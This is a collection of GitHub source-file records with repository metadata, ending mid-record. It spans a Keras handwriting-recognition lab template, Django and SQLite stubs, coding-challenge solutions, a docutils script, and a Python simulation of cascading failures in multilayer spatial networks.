1ce69a1233f5a517348185955b4ec1e46eafffd4 | c7aea375046d194a5bd3c9fda615519f4374b790 | /lab3/text_recognizer/networks/line_lstm_ctc.py | 35205b418d4502e5425aa5d9522fd2821741b094 | [] | no_license | venuraja79/fsdl-text-recognizer-project | 195b16bff453df5acda65181e96f65cb98172b54 | 1b9d20f0de2dd5aa59af490b086f985411c60e20 | refs/heads/master | 2020-06-30T22:09:45.433461 | 2019-08-07T08:53:05 | 2019-08-07T08:53:05 | 200,964,049 | 0 | 1 | null | 2019-08-07T03:20:26 | 2019-08-07T03:20:24 | null | UTF-8 | Python | false | false | 2,406 | py | """LSTM with CTC for handwritten text recognition within a line."""
import tensorflow.keras.backend as K
from tensorflow.python.client import device_lib # pylint: disable=no-name-in-module
from tensorflow.keras.layers import Dense, Input, Reshape, TimeDistributed, Lambda, LSTM, CuDNNLSTM
from tensorflow.keras.models import Model as KerasModel
from text_recognizer.networks.lenet import lenet
from text_recognizer.networks.misc import slide_window
from text_recognizer.networks.ctc import ctc_decode
def line_lstm_ctc(input_shape, output_shape, window_width=28, window_stride=14): # pylint: disable=too-many-locals
image_height, image_width = input_shape
output_length, num_classes = output_shape
num_windows = int((image_width - window_width) / window_stride) + 1
if num_windows < output_length:
raise ValueError(f'Window width/stride need to generate >= {output_length} windows (currently {num_windows})')
image_input = Input(shape=input_shape, name='image')
y_true = Input(shape=(output_length,), name='y_true')
input_length = Input(shape=(1,), name='input_length')
label_length = Input(shape=(1,), name='label_length')
gpu_present = len(device_lib.list_local_devices()) > 2
lstm_fn = CuDNNLSTM if gpu_present else LSTM
# Your code should use slide_window and extract image patches from image_input.
# Pass a convolutional model over each image patch to generate a feature vector per window.
# Pass these features through one or more LSTM layers.
# Convert the lstm outputs to softmax outputs.
# Note that lstms expect a input of shape (num_batch_size, num_timesteps, feature_length).
# Your code below (Lab 3)
# Your code above (Lab 3)
input_length_processed = Lambda(
lambda x, num_windows=None: x * num_windows,
arguments={'num_windows': num_windows}
)(input_length)
ctc_loss_output = Lambda(
lambda x: K.ctc_batch_cost(x[0], x[1], x[2], x[3]),
name='ctc_loss'
)([y_true, softmax_output, input_length_processed, label_length])
ctc_decoded_output = Lambda(
lambda x: ctc_decode(x[0], x[1], output_length),
name='ctc_decoded'
)([softmax_output, input_length_processed])
model = KerasModel(
inputs=[image_input, y_true, input_length, label_length],
outputs=[ctc_loss_output, ctc_decoded_output]
)
return model
| [
"sergeykarayev@gmail.com"
] | sergeykarayev@gmail.com |
f49719da2036ba7ff1dc02db5fb0434c2acd830a | f23a0561ed2e1f5192a2933ba3205bbc84e0172c | /ruidun_system/internet_operate/viewsets/get_monitoring_viewset.py | f7d1a4efbee6c85c9b9e2e159797e78386e57bc5 | [] | no_license | TingxieLi/django-restframework | a179a794760830cedcf60c0069cb7c8d4c7127cd | 3645bc3a396727af208db924c6fdee38abc0f894 | refs/heads/master | 2020-12-05T13:13:29.937243 | 2019-07-18T03:33:23 | 2019-07-18T03:33:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | from rest_framework import viewsets
class GetMonitoringViewSet(viewsets.ReadOnlyModelViewSet):
def retrieve(self, request, *args, **kwargs):
# 获取视频内容,视频应该是实时传输的,这里应该怎么返回数据?
pass
| [
"851864721@qq.com"
] | 851864721@qq.com |
0aa90b1e9af9a19c4e57f160a662fd7073394839 | 4393f8f877fe12f5c1ddad07dab36b5e14b5311d | /challenge_01.py | 65ea466563141e447cf266d050d6850f2be56801 | [
"MIT"
] | permissive | jose112624120/python_challenge | 5679c94d45d317e8c63818cd853d27b13ea1b773 | 38ea1ef68a78fe143393c78b61263890c5069f44 | refs/heads/master | 2020-03-07T15:20:32.935198 | 2018-03-31T17:09:44 | 2018-03-31T17:09:44 | 127,552,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | TEXT = "g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj."
URL = "http://www.pythonchallenge.com/pc/def/map.html"
def shiftby2(s):
shifted = ord(s)
if ('a' <= s) and (s <= 'z'):
shifted += + 2
if shifted > ord('z'):
shifted = ord('a') + shifted - ord('z') - 1
return chr(shifted)
def main():
print('main')
mapped = map(shiftby2,TEXT)
mapped_str = ''.join([x for x in mapped])
print(mapped_str)
mapped = map(shiftby2,"map")
mapped_str = ''.join([x for x in mapped])
print(mapped_str)
print('next challenge:\n',URL.replace('map', mapped_str))
print('other (more clever) solutions:\n',URL.replace('map', mapped_str).replace('pc','pcc'))
if __name__ == '__main__':
main() | [
"jose112624120@gmail.com"
] | jose112624120@gmail.com |
08f94cf25a949eefbaca4cf0a9b2fc8d254be62e | f295b56e9af284092233a724af041a91b35a9f6a | /binary-tree-level-order-traversal/binary-tree-level-order-traversal.py | eb00973a0045f605df9fbf717059748d2f4e83a2 | [] | no_license | saviaga/Coding_E | 7ebdf03b5eca775903ee4b863b56e26190b40029 | dd21bb3b9d8905263416b206877f1a3d9416ee3f | refs/heads/main | 2023-05-02T19:42:07.267054 | 2021-05-21T17:41:52 | 2021-05-21T17:41:52 | 334,220,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
if root is None:
return
queue = collections.deque([root])
ans = []
while queue:
level = []
for _ in range(len(queue)):
current = queue.popleft()
level.append(current.val)
if current.left:
queue.append(current.left)
if current.right:
queue.append(current.right)
ans.append(level)
return ans
| [
"saviaga@gmail.com"
] | saviaga@gmail.com |
df51ee1469b90b20b6b1d9cc6a0192fe89b63bac | 40ea5fe2ce75bafa64aa5f5886d6eafc284ccf85 | /fornax/stages/sync/sync.py | 053de457fef6732c4cc2eec57f24001573badbe3 | [
"MIT"
] | permissive | lwencel-priv/fornax | 9a795693fa897210c1af82a00ba647e6ea1682ab | 0f66a6284975bc5a2cfc3d38bc01ef6ad492e40e | refs/heads/master | 2023-01-06T17:48:46.882187 | 2020-11-07T12:19:26 | 2020-11-12T17:39:26 | 297,463,708 | 0 | 0 | MIT | 2020-11-07T12:19:27 | 2020-09-21T21:19:14 | Python | UTF-8 | Python | false | false | 1,353 | py | from argparse import Namespace
from typing import Dict
from shutil import rmtree
from fornax.utils.repository import RepositoryFactory
from fornax.consts import StageType
from ..base_stage import BaseStage
class SyncStage(BaseStage):
def __init__(self, prev_stages_args: Dict[StageType, Namespace], args: Namespace):
"""Initialize sync stage.
:param args: pipeline args
:type args: Namespace
:param prev_stages_args: pipeline args from previous stages
:type prev_stages_args: Dict[StageType, Namespace]
"""
super().__init__(prev_stages_args, args)
rmtree(args.workspace, ignore_errors=True)
args.workspace.mkdir(parents=True, exist_ok=True)
self._local_manifests_dir.mkdir(parents=True, exist_ok=True)
args.repository_storage_path.mkdir(parents=True, exist_ok=True)
self._repo = RepositoryFactory().create(
self._args.manifest_type,
source_path=self._args.source_path,
source_path_type=self._args.source_path_type,
branch=self._args.branch,
repo_storage=self._args.repository_storage_path,
workspace=self._workspace,
local_manifests_storage=self._local_manifests_dir,
)
def _run(self) -> None:
"""Run sync stage."""
self._repo.sync()
| [
"lukasz.wen@outlook.com"
] | lukasz.wen@outlook.com |
4ce02e446ce4895df060625959a73f6d4a1e7ff2 | 1deda52f84b25e52a70dd26afa31c1e40a8391ac | /tools/improved-bertscore-for-image-captioning-evaluation/match_cand_refs.py | e691f1f139291d3f3ce03d32227a38703e6144ae | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jlcsilva/syncap | 7ae7b7974b1c3eeb6507006a325725a67c765c7b | c8191de4e77b6ea9109f124b9f398d9f2c7d7662 | refs/heads/master | 2023-04-10T23:16:39.902339 | 2021-04-23T06:03:24 | 2021-04-23T06:03:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | import json
import argparse
from collections import defaultdict
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--refs_file')
parser.add_argument('--cand_file')
parser.add_argument('--output_fn')
args = parser.parse_args()
# Refs
j = json.load(open(args.refs_file))
anns = j['annotations']
image2anns = defaultdict(list)
for ann in anns:
image2anns[ann['image_id']].append(ann['caption'].strip())
# Cand
j = json.load(open(args.cand_file))
image2cand = defaultdict(list)
for ann in j:
image2cand[ann['image_id']].append(ann['caption'])
samples = {}
for ix, img in enumerate(image2cand):
d = dict()
d['refs'] = image2anns[img] #[:5]
d['cand'] = image2cand[img]
samples[str(ix)] = d
with open(args.output_fn, 'w') as f:
json.dump(samples, f)
| [
"emanuele@di.ku.dk"
] | emanuele@di.ku.dk |
79d14202170a7d08135e126bbb7479e3da932f84 | 09f0505f3ac1dccaf301c1e363423f38768cc3cc | /r_DailyProgrammer/Easy/C266/unittests/unittest.py | 07fde993ddb932a70f2021b847e679aadef121e2 | [] | no_license | Awesome-Austin/PythonPractice | 02212292b92814016d062f0fec1c990ebde21fe7 | 9a717f91d41122be6393f9fcd1a648c5e62314b3 | refs/heads/master | 2023-06-21T11:43:59.366064 | 2021-07-29T23:33:00 | 2021-07-29T23:33:00 | 270,854,302 | 0 | 0 | null | 2020-08-11T20:47:10 | 2020-06-08T23:24:09 | Python | UTF-8 | Python | false | false | 259 | py | #! python3
import unittest
from r_DailyProgrammer.Easy.C266.unittests.test_values import TEST_VALUES
class MyTestCase(unittest.TestCase):
def test_something(self):
self.assertEqual(True, False)
if __name__ == '__main__':
unittest.main()
| [
"{ID}+{username}@users.noreply.github.com"
] | {ID}+{username}@users.noreply.github.com |
a16b3a1d3c9f40a23d5d7b127abd1bbd68ff6124 | 7716a18812326afb007ab22d65c92d6c79bb7278 | /Homework_05/main.py | c00f9626bbd9f66de7a1e99c670711d64b7b5f2f | [] | no_license | Peter1509/Homework05 | b7bc6b36f8623e6144242f69ea39aeb6233bd756 | 36054e825734e4368e278331ee4072e7f8648963 | refs/heads/master | 2020-12-27T19:20:43.699272 | 2020-02-03T17:21:53 | 2020-02-03T17:21:53 | 238,020,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,928 | py | from smartninja_sql.sqlite import SQLiteDatabase
db = SQLiteDatabase("BlogDB_main.sqlite")
db.execute("""CREATE TABLE IF NOT EXISTS User(
UserId integer primary key autoincrement,
Username text,
Mailadress text UNIQUE,
FirstName text,
LastName text,
Birthday real,
Password text);
""")
db.pretty_print("SELECT * FROM User;")
db.execute("""CREATE TABLE IF NOT EXISTS Posts(
PostId integer primary key autoincrement,
UserId integer,
PostDefaultId integer,
PostAdminId integer,
CommentId integer,
PostImageId integer);
""")
db.pretty_print("SELECT * FROM Posts;")
db.execute("""CREATE TABLE IF NOT EXISTS Posts_Default(
PostDefaultId integer primary key autoincrement,
PostName text,
PostText text);
""")
db.pretty_print("SELECT * FROM Posts_Default;")
db.execute("""CREATE TABLE IF NOT EXISTS Posts_Admin(
PostAdminId integer primary key autoincrement,
PostName text,
PostText text);
""")
db.pretty_print("SELECT * FROM Posts_Admin;")
db.execute("""CREATE TABLE IF NOT EXISTS Comments(
CommentId integer primary key autoincrement,
CommentText text);
""")
db.pretty_print("SELECT * FROM Comments;")
db.execute("""CREATE TABLE IF NOT EXISTS Post_Image(
PostImageId integer primary key autoincrement,
ImageId integer);
""")
db.pretty_print("SELECT * FROM Post_Image;")
db.execute("""CREATE TABLE IF NOT EXISTS Images(
ImageId integer primary key autoincrement,
Imagetyp text);
""")
db.pretty_print("SELECT * FROM Images;")
| [
"noreply@github.com"
] | Peter1509.noreply@github.com |
994ef013a80753d1c06d852b575d1419200b2001 | 631c71f4f4309668dd7a3de9e7eeef944eac2158 | /src/pretix/__init__.py | 9e086b08d5bc3bcda9b85a56c4141cb81d10c768 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | bhaettasch/pretix | 943ee6d8cb48fccd343e2e6fa054c8c4c86f5231 | 5e355b400573783bdd17b1352aefcb36b0efc3f6 | refs/heads/master | 2021-04-18T16:19:48.121409 | 2021-01-05T08:23:00 | 2021-01-05T08:23:00 | 249,561,199 | 0 | 0 | NOASSERTION | 2020-03-23T22:48:21 | 2020-03-23T22:48:20 | null | UTF-8 | Python | false | false | 28 | py | __version__ = "3.15.0.dev0"
| [
"mail@raphaelmichel.de"
] | mail@raphaelmichel.de |
7e177a8d82713addc215fa1037b0a74cbfaafb7d | b9be3d951bfab350191092540edc6e353283d621 | /.direnv/python-3.4.3/bin/rst2xml.py | 94a9206c1126cc30a738a855d3950f2aca899539 | [] | no_license | bekkblando/django-social | 7ebd82f66c82ffa6918621e5ee7142bfa5f712d8 | fe47d1babb94170e5403af9ce0f3c672c3045a0d | refs/heads/master | 2020-12-11T01:40:01.429628 | 2015-08-18T14:24:33 | 2015-08-18T14:24:33 | 38,706,690 | 0 | 0 | null | 2015-07-07T18:25:26 | 2015-07-07T18:25:25 | null | UTF-8 | Python | false | false | 668 | py | #!/Users/BekkBlando/Documents/github/djangosocial/.direnv/python-3.4.3/bin/python3.4
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| [
"bekkblando@gmail.com"
] | bekkblando@gmail.com |
3b92c36c78da0c58ac23cc2b52f5fed11ac2c546 | 04b6cde8f943dccec3dec0aa7399c5eebb4c4ab5 | /codes/Version 6.2/main - Copy.py | ab5376391144ab0a59b7e193c8d3ac4fd6697be8 | [
"MIT"
] | permissive | junohpark221/BSc_individual_project | 708f4ab4088ca7d338a78d51882b019acba017fb | 44f49d3cbb93298880f046551056185b72324d17 | refs/heads/main | 2023-05-18T22:27:49.878182 | 2021-06-02T09:08:25 | 2021-06-02T09:08:25 | 373,092,160 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,936 | py | import networkx as nx
from pymnet import *
import random
import matplotlib
import cascade as cas
import math
import time
matplotlib.use('TkAgg')
nodes = 300
layers = 3
intra_thres = 0.1
inter_thres = 0.05
attack_size = 30
attack_type = "spatial_number" # choose one of the "normal", "spatial_number", "spatial_range"
support_type = "random_layers" # choose one of the "random_nodes", "random_layers"
edge_type = "undirected" # choose one of the "undirected", "directed"
coords = {}
rgg_rgg_supp_nodes = {}
rgg_rand_supp_nodes = {}
rand_rgg_supp_nodes = {}
rand_rand_supp_nodes = {}
intra_rgg_edges = []
intra_rand_edges = []
inter_rgg_edges = []
inter_rand_edges = []
intra_edges_num = []
inter_edges_num = [] # [for_edge, back_edge, for_supp_edge, back_supp_edge]
data_set = []
def cal_dist(cur_node, target_node):
x1, y1 = coords[cur_node]
x2, y2 = coords[target_node]
d = math.sqrt((x1-x2)**2 + (y1-y2)**2)
return d
def find_nearest_node(cur_node, supporting_node, neighbours, target_layers):
candidates = []
for target_node in neighbours:
if target_node[1] in target_layers:
dist = cal_dist(cur_node, target_node[0])
candidates.append((target_node[0], dist))
if len(candidates) != 0:
s_candidates = sorted(candidates, key=lambda dist: dist[1])
supporting_node = s_candidates[0][0]
return supporting_node
def make_interlayer_edges(net, cur_layer, layer_names, intra_type, inter_type):
if (intra_type == 'RGG') and (inter_type == 'RGG'):
if cur_layer != (len(layer_names) - 1):
for_edges = 0
back_edges = 0
for_supp_edges = 0
back_supp_edges = 0
for cur_node in range((cur_layer * nodes), (cur_layer + 1) * nodes):
for target_node in range((cur_layer + 1) * nodes, (cur_layer + 2) * nodes):
d = cal_dist(cur_node, target_node)
if d <= inter_thres:
net[cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] = 1
net[target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] = 1
inter_rgg_edges.append((cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]))
inter_rgg_edges.append((target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]))
if cur_node in rgg_rgg_supp_nodes[target_node]:
for_supp_edges += 1
else:
for_edges += 1
if target_node in rgg_rgg_supp_nodes[cur_node]:
back_supp_edges += 1
else:
back_edges += 1
inter_edges_num.append([for_edges, back_edges, for_supp_edges, back_supp_edges])
elif (intra_type == 'RGG') and (inter_type == 'Random'):
if cur_layer != (len(layer_names) - 1):
for_edges = 0
back_edges = 0
for_supp_edges = 0
back_supp_edges = 0
cur_nodes = list(range((cur_layer * nodes), (cur_layer + 1) * nodes))
target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
random.shuffle(target_nodes)
for target_node in target_nodes:
for cur_target in rgg_rand_supp_nodes[target_node]:
if cur_target in cur_nodes:
net[cur_target, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] = 1
inter_rand_edges.append((cur_target, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]))
for_supp_edges += 1
if for_supp_edges >= inter_edges_num[cur_layer][2]:
break
if for_supp_edges >= inter_edges_num[cur_layer][2]:
break
random.shuffle(cur_nodes)
for cur_node in cur_nodes:
for cur_target in rgg_rand_supp_nodes[cur_node]:
if cur_target in target_nodes:
net[cur_target, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] = 1
inter_rand_edges.append((cur_target, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]))
back_supp_edges += 1
if back_supp_edges >= inter_edges_num[cur_layer][3]:
break
if back_supp_edges >= inter_edges_num[cur_layer][3]:
break
sorted(cur_nodes)
sorted(target_nodes)
while for_edges < inter_edges_num[cur_layer][0]:
cur_node = random.choice(cur_nodes)
target_node = random.choice(target_nodes)
if net[cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] == 0:
net[cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] = 1
inter_rand_edges.append((cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]))
for_edges += 1
while back_edges < inter_edges_num[cur_layer][1]:
cur_node = random.choice(cur_nodes)
target_node = random.choice(target_nodes)
if net[target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] == 0:
net[target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] = 1
inter_rand_edges.append((target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]))
back_edges += 1
elif (intra_type == 'Random') and (inter_type == 'RGG'):
for node_from, node_to, layer_from, layer_to in inter_rgg_edges:
net[node_from, node_to, layer_from, layer_to] = 1
elif (intra_type == 'Random') and (inter_type == 'Random'):
for node_from, node_to, layer_from, layer_to in inter_rand_edges:
net[node_from, node_to, layer_from, layer_to] = 1
return net
def make_intralayer_edges(net, cur_layer, cur_layer_name, intra_type, inter_type):
if (intra_type == 'RGG') and (inter_type == 'RGG'):
edges = 0
for cur_node in range(cur_layer * nodes, (cur_layer + 1) * nodes):
for target_node in range(cur_layer * nodes, (cur_layer + 1) * nodes):
if cur_node != target_node:
d = cal_dist(cur_node, target_node)
if d <= intra_thres:
net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
intra_rgg_edges.append((cur_node, target_node, cur_layer_name))
edges += 1
intra_edges_num.append(edges)
elif (intra_type == 'RGG') and (inter_type == 'Random'):
for cur_node, target_node, cur_layer_name in intra_rgg_edges:
net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
elif (intra_type == 'Random') and (inter_type == 'RGG'):
cur_nodes = list(range((cur_layer * nodes), ((cur_layer + 1) * nodes)))
target_nodes = list(range((cur_layer * nodes), ((cur_layer + 1) * nodes)))
edges = 0
while edges < intra_edges_num[cur_layer]:
cur_node = random.choice(cur_nodes)
target_node = random.choice(target_nodes)
if net[cur_node, target_node, cur_layer_name, cur_layer_name] == 0:
net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
intra_rand_edges.append((cur_node, target_node, cur_layer_name))
edges += 1
elif (intra_type == 'Random') and (inter_type == 'Random'):
for cur_node, target_node, cur_layer_name in intra_rand_edges:
net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
return net
def make_edges(net, layer_names, intra_type, inter_type):
for cur_layer in range(layers):
net = make_intralayer_edges(net, cur_layer, layer_names[cur_layer], intra_type, inter_type)
net = make_interlayer_edges(net, cur_layer, layer_names, intra_type, inter_type)
return net
def find_supporting_nodes(layer_names, intra_type, inter_type):
if (intra_type == 'RGG') and (inter_type == 'RGG'):
for cur_layer in range(len(layer_names)):
target_nodes = []
if cur_layer == 0:
target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
elif cur_layer == len(layer_names) - 1:
target_nodes = list(range(((cur_layer - 1) * nodes), cur_layer * nodes))
else:
if support_type == "random_nodes":
target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
elif support_type == "random_layers":
choice = random.choice([(cur_layer - 1), (cur_layer + 1)])
target_nodes = list(range((choice * nodes), ((choice + 1) * nodes)))
for cur_node in range(cur_layer * nodes, (cur_layer + 1) * nodes):
temp_supp = []
for target_node in target_nodes:
cur_dist = cal_dist(cur_node, target_node)
if cur_dist <= inter_thres:
temp_supp.append(target_node)
rgg_rgg_supp_nodes[cur_node] = temp_supp
elif (intra_type == 'Random') and (inter_type == 'RGG'):
for cur_node in rgg_rgg_supp_nodes:
rand_rgg_supp_nodes[cur_node] = rgg_rgg_supp_nodes[cur_node]
elif (intra_type == 'RGG') and (inter_type == 'Random'):
for cur_layer in range(len(layer_names)):
target_nodes = []
if cur_layer == 0:
target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
elif cur_layer == len(layer_names) - 1:
target_nodes = list(range(((cur_layer - 1) * nodes), cur_layer * nodes))
else:
if support_type == "random_nodes":
target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
elif support_type == "random_layers":
if inter_edges_num[cur_layer][3] == 0:
choice = cur_layer - 1
else:
choice = cur_layer + 1
target_nodes = list(range((choice * nodes), ((choice + 1) * nodes)))
random.shuffle(target_nodes)
cur_layer_nodes = list(range((cur_layer * nodes), ((cur_layer + 1) * nodes)))
random.shuffle(cur_layer_nodes)
index = 0
for cur_node in cur_layer_nodes:
temp_supp = []
cur_supp = len(rgg_rgg_supp_nodes[index])
for i in range(cur_supp):
temp_supp.append(target_nodes[i])
random.shuffle(target_nodes)
rgg_rand_supp_nodes[cur_node] = temp_supp
index += 1
elif (intra_type == 'Random') and (inter_type == 'Random'):
for cur_node in rgg_rand_supp_nodes:
rand_rand_supp_nodes[cur_node] = rgg_rand_supp_nodes[cur_node]
def make_nodes(net, layer_names, intra_type, inter_type):
for i in range(layers):
for j in range(nodes):
if (intra_type == 'RGG') and (inter_type == 'RGG'):
coords[(i * nodes) + j] = (random.random(), random.random())
net.add_node((i * nodes) + j, layer_names[i])
return net
def make_network_layer(net, layer_names):
for i in range(layers):
layer_name = chr(97 + i)
net.add_layer(layer_name, aspect=0)
layer_names.append(layer_name)
return net, layer_names
def build_network(intra_type, inter_type):
layer_names = []
net = MultilayerNetwork(aspects=1, fullyInterconnected=False, directed=False)
net, layer_names = make_network_layer(net, layer_names)
net = make_nodes(net, layer_names, intra_type, inter_type)
find_supporting_nodes(layer_names, intra_type, inter_type)
net = make_edges(net, layer_names, intra_type, inter_type)
return net
def analyse_initial_network(net):
layer_names = net.get_layers() # return dictionary
layer_names = sorted(list(layer_names))
stats = { "clustering":[], # Average clustering coefficient
"mean degree":[], # Mean degree
"components":[], # Components of the graph in each layers
"largest component":[], # The largest component of the graphs
"size of largest component":[], # The size of the largest component
}
cur_layer = 0
for layer in layer_names:
edges = []
for i in range((cur_layer * nodes), ((cur_layer + 1) * nodes)):
for j in range((cur_layer * nodes), ((cur_layer + 1) * nodes)):
if (i != j) & (net[i, j, layer, layer] == 1):
edges.append((i, j))
"""
for edge in net.edges:
if edge[2] == edge[3] == layer:
edges.append(edge[:1])
"""
G = nx.Graph()
G.add_edges_from(edges)
components = []
for sub_G in nx.connected_components(G):
components.append(sub_G)
stats["clustering"].append(nx.average_clustering(G))
stats["mean degree"].append(len(edges) * 2 / nodes)
stats["components"].append(components)
stats["largest component"].append(max(components, key=len))
stats["size of largest component"].append(len(max(components, key=len)))
cur_layer +=1
keyList = stats.keys()
for key in keyList:
print("Key:%s\t"%key)
print(stats[key])
def analyse_attacked_network(net):
layer_names = net.get_layers()
layer_names = sorted(list(layer_names))
stats = { "clustering":[], # Average clustering coefficient
"mean degree":[], # Mean degree
"components":[], # Components of the graph in each layers
"largest component":[], # The largest component of the graphs
"size of largest component":[], # The size of the largest component
}
def draw_network(net, type):
fig = draw(net, nodeCoords=coords, nodeLabelRule={}, nodeSizeRule={'rule':'scaled', 'scalecoeff': 0.01}, defaultEdgeWidth=0.5, show=False)
fig.savefig("%s Network.pdf" % type)
if __name__ == "__main__":
start = time.time()
rgg_rgg_net = build_network(intra_type='RGG', inter_type='RGG')
# analyse_initial_network(rgg_rgg_net)
# draw_network(rgg_rgg_net, type="intra_RGG, inter_RGG")
print("1st: Done")
rgg_rand_net = build_network(intra_type='RGG', inter_type='Random')
# analyse_initial_network(rgg_rand_net)
# draw_network(rgg_rand_net, type="intra_RGG, inter_Random")
print("2nd: Done")
rand_rgg_net= build_network(intra_type='Random', inter_type='RGG')
# analyse_initial_network(rand_rgg_net)
# draw_network(rand_rgg_net, type="intra_Random, inter_RGG")
print("3rd: Done")
rand_rand_net = build_network(intra_type='Random', inter_type='Random')
# analyse_initial_network(rand_rand_net)
# draw_network(rand_rand_net, type="intra_Random, inter_Random")
print("4th: Done")
print("time: ", time.time() - start)
"""
Types of attacks/cascades:
1. normal attack: select nodes that will be initially attacked randomly.
2. spatial_number attack: select the nearest (attack_number) nodes from the attack_point, and they will be initially attacked.
3. spatial_range attack: nodes in the circle (centre: attack_point, radius: attack_radius) will be attacked initially.
For "normal" attack, cas.attack_network(network, coords, supporting_nodes, attack_type, attack_size=20)
For "spatial_number" attack, cas.attack_network(network, coords, supporting_nodes, attack_type, attack_size=20, attack_layer='a', attack_point=(0.5, 0.5))
For "spatial_range" attack, cas.attack_network(network, coords, supporting_nodes, attack_type, attack_layer='a', attack_point=(0.5, 0.5), attack_radius=0.1)
attack_size = 20 # number of nodes that will be initially killed
attack_layer = 'a' # the target layer of the attack.
'a', 'b', 'c'... means the specific layer. 0 means that suppose every nodes are in the same layer.
attack_point = (0.5, 0.5) # attack point for spatial_number and spatial_range attacks
attack_radius = 0.1 # the radius of attack in spatial_range attacks
"""
# att_rgg_rgg_net = cas.attack_network(rgg_rgg_net, coords, rgg_rgg_supp_nodes, attack_type, graph_type="RGG_RGG", attack_size=20)
att_rgg_rgg_net = cas.attack_network(rgg_rgg_net, coords, rgg_rgg_supp_nodes, attack_type, graph_type="RGG_RGG", attack_size=attack_size, attack_point=(0.5, 0.5))
# att_rgg_rgg_net = cas.attack_network(rgg_rgg_net, coords, rgg_rgg_supp_nodes, attack_type, graph_type="RGG_RGG", attack_point=(0.5, 0.5), attack_radius=0.1)
# analyse_attacked_network(attacked_network)
# draw_network(attacked_network, type="Attacked RGG")
# att_rgg_rand_net = cas.attack_network(rgg_rand_net, coords, rgg_rand_supp_nodes, attack_type, graph_type="RGG_Rand", attack_size=20)
att_rgg_rand_net = cas.attack_network(rgg_rand_net, coords, rgg_rand_supp_nodes, attack_type, graph_type="RGG_Rand", attack_size=attack_size, attack_point=(0.5, 0.5))
# att_rgg_rand_net = cas.attack_network(rgg_rand_net, coords, rgg_rand_supp_nodes, attack_type, graph_type="RGG_Rand", attack_point=(0.5, 0.5), attack_radius=0.1)
# analyse_attacked_network(attacked_rand_network)
# draw_network(attacked_rand_network, type="Attacked Random")
# att_rand_rgg_net = cas.attack_network(rand_rgg_net, coords, rand_rgg_supp_nodes, attack_type, graph_type="Rand_RGG", attack_size=20)
att_rand_rgg_net = cas.attack_network(rand_rgg_net, coords, rand_rgg_supp_nodes, attack_type, graph_type="Rand_RGG", attack_size=attack_size, attack_point=(0.5, 0.5))
# att_rand_rgg_net = cas.attack_network(rand_rgg_net, coords, rand_rgg_supp_nodes, attack_type, graph_type="Rand_RGG", attack_point=(0.5, 0.5), attack_radius=0.1)
# analyse_attacked_network(attacked_rand_network)
# draw_network(attacked_rand_network, type="Attacked Random")
# att_rand_rand_net = cas.attack_network(rand_rand_net, coords, rand_rand_supp_nodes, attack_type, graph_type="Rand_Rand", attack_size=20)
att_rand_rand_net = cas.attack_network(rand_rand_net, coords, rand_rand_supp_nodes, attack_type, graph_type="Rand_Rand", attack_size=attack_size, attack_point=(0.5, 0.5))
# att_rand_rand_net = cas.attack_network(rand_rand_net, coords, rand_rand_supp_nodes, attack_type, graph_type="Rand_Rand", attack_point=(0.5, 0.5), attack_radius=0.1)
# analyse_attacked_network(attacked_rand_network)
# draw_network(att_rgg_rgg_net, type="Attacked intra_RGG, inter_RGG")
# draw_network(att_rgg_rand_net, type="Attacked intra_RGG, inter_Rand")
# draw_network(att_rand_rgg_net, type="Attacked intra_Rand, inter_RGG")
# draw_network(att_rand_rand_net, type="Attacked intra_Rand, inter_Rand")
print("time: ", time.time() - start)
| [
"junohpark221@gmail.com"
] | junohpark221@gmail.com |
f6de8840feaa6b8b1a09493b169925ace0eaa131 | b129e8fed37768c3af97735c1cb088d05315cf1c | /soundata/io.py | b367b8209335e973182e3cca226cbaedbb0736b7 | [
"BSD-3-Clause"
